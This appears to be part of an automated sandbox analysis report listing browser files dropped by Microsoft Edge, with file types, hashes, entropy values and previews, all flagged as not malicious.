                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.792967001793833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfB87JiZ95ih/cI9URLl8Roto9MFVvlwh7e4IbONIeTC6XQS0qGqk+Z4uj+t:akZ+reiRUah96qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                                  MD5:A16779BEC6AF57E5D4CE751AFAD1B49E
                                                                                                                                                                                                                                                                                                                  SHA1:1C4B0DA883C4D2EB38DBF930ED73ABF4FB440094
                                                                                                                                                                                                                                                                                                                  SHA-256:8C3AEE9E6C34C13B4E10C3FA95C6B64BEC02FF74BBD9F1CFF5270B7A74322200
                                                                                                                                                                                                                                                                                                                  SHA-512:45A9D99927D197BCC7CC0835608C3D816F0CF620BACB8C19C9BBF3007CF95E1EB3FEA4E7D02C79BC6933BA22FA7A896B0C0DC798868931ED83FA9947A3335730
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADe3jLf1K+YSZ+8aMuC2HVcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACqc/jx06ma/YRHxzvl6kamXTpfwnmeMwDB4ezErvhBVAAAAAA
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlP4:Ls3Q
                                                                                                                                                                                                                                                                                                                  MD5:4BD6CB7D72C7AB5010396409048B14F4
                                                                                                                                                                                                                                                                                                                  SHA1:339B102C75C2B53D5B57793FABE9949AF8ADAFE4
                                                                                                                                                                                                                                                                                                                  SHA-256:37E5071C062EAAB0F95F31A0E5933BE2F9627521FF632D6D99ED270F745484A0
                                                                                                                                                                                                                                                                                                                  SHA-512:5FD692D7DA67FDEB8EA5806A76D78562D61654A33FB6D57E0DCAC1B5AF14E411663482B262A5EBAE16D9BD27A1688CE389E4DD1523BA0BAA180290E602E70FB1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.........................................@.P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
